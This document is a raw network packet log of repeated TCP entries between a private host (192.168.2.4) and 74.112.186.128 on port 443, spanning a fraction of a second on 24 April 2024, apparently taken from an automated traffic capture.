Apr 24, 2024 08:40:09.158585072 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.158596039 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.162241936 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.162298918 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.162309885 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.165723085 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.165781975 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.165787935 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.169329882 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.169384956 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.169389963 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.172821999 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.172887087 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.172892094 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.176376104 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.176425934 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.176431894 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.179792881 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.179852009 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.179857969 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.183218956 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.183265924 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.183270931 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.185049057 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.185121059 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.185127974 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.188474894 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.188530922 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.188538074 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.191819906 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.191864967 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.191871881 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.195291996 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.195348024 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.195353985 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.198813915 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.198873043 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.198885918 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.202101946 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.202157974 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.202168941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.205425024 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.205492020 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.205501080 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.208272934 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.208336115 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.208343029 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.210861921 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.210927963 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.210936069 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.213829041 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.213887930 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.213896990 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.216279030 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.216326952 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.216332912 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.218899012 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.218945026 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.218950987 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.222945929 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.222990036 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.222995996 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.225517035 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.225573063 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.225579977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.228185892 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.228230000 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.228235960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.230732918 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.230789900 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.230794907 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.233319998 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.233365059 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.233371019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.235867023 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.235929012 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.235934019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.238356113 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.238409996 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.238415956 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.240883112 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.240937948 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.240943909 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.243326902 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.243401051 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.243403912 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.243431091 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.243475914 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.245769978 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.248223066 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.248276949 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.248282909 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.250514984 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.250564098 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.250570059 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.252882957 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.252924919 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.252931118 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.255253077 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.255301952 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.255307913 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.257572889 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.257622957 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.257628918 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.258797884 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.258846045 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.258852005 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.261077881 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.261126995 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.261132956 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.263261080 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.263307095 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.263313055 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.265659094 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.265711069 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.265717030 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.267879009 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.267934084 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.267945051 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.270062923 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.270112038 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.270117998 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.272068977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.272119999 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.272125006 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.274163008 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.274211884 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.274219036 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.276287079 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.276343107 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.276350021 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.278414965 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.278464079 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.278470039 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.280411005 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.280459881 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.280466080 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.282469034 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.282517910 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.282522917 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.284575939 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.284624100 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.284630060 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.286606073 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.286650896 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.286657095 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.289474964 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.289520979 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.289526939 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.291506052 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.291555882 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.291560888 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.293450117 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.293498993 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.293504953 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.295434952 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.295483112 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.295488119 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.297426939 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.297473907 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.297480106 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.299364090 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.299422026 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.299428940 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.301243067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.301289082 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.301295996 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.303200960 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.303251028 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.303256989 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.305058956 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.305107117 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.305111885 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.306931973 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.306979895 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.306986094 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.308775902 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.308825016 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.308830976 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.310672045 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.310719013 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.310724020 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.312585115 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.312633038 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.312638998 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.314433098 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.314481020 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.314486980 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.316406965 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.316452980 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.316458941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.318867922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.318914890 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.318919897 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.320700884 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.320755005 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.320760012 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.322504997 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.322554111 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.322559118 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.324250937 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.324292898 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.324297905 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.326029062 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.326077938 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.326082945 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.327749968 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.327797890 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.327804089 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.329555035 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.329601049 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.329606056 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.331192017 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.331239939 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.331244946 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.332981110 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.333025932 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.333030939 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.334615946 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.334665060 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.334670067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.336318016 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.336364031 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.336369991 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.337976933 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.338026047 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.338031054 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.339648962 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.339695930 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.339701891 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.341267109 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.341314077 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.341319084 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.342394114 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.342441082 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.342446089 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.343859911 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.343911886 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.343918085 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.345479965 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.345526934 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.345534086 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.347115993 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.347162962 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.347168922 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.348653078 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.348701000 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.348706007 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.350260973 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.350307941 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.350313902 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.351877928 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.351926088 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.351932049 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.353400946 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.353457928 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.353463888 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.354965925 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.355015039 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.355020046 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.356791019 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.356838942 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.356843948 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.358078003 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.358127117 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.358133078 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.359669924 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.359716892 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.359721899 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.361167908 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.361217022 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.361222029 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.362608910 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.362657070 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.362663031 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.364140987 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.364188910 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.364195108 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.365612984 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.365663052 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.365669012 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.367219925 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.367263079 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.367268085 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.368527889 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.368575096 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.368581057 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.369992971 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.370039940 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.370044947 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.371490002 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.371539116 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.371543884 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.372833014 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.372880936 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.372886896 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.374429941 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.374479055 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.374484062 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.375772953 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.375822067 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.375828028 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.377170086 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.377217054 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.377223015 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.378582954 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.378637075 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.378643036 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.380016088 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.380065918 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.380072117 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.381347895 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.381406069 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.381412029 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.383138895 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.383193016 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.383198977 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.384088039 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.384169102 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.384175062 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.385443926 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.385488033 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.385493994 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.386743069 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.386789083 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.386795044 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.388027906 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.388070107 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.388076067 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.389311075 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.389357090 CEST	49734	443	192.168.2.4	74.112.186.128
Apr 24, 2024 08:40:09.389362097 CEST	443	49734	74.112.186.128	192.168.2.4
Apr 24, 2024 08:40:09.390661955 CEST	443	49734	74.112.186.128	192.168.2.4
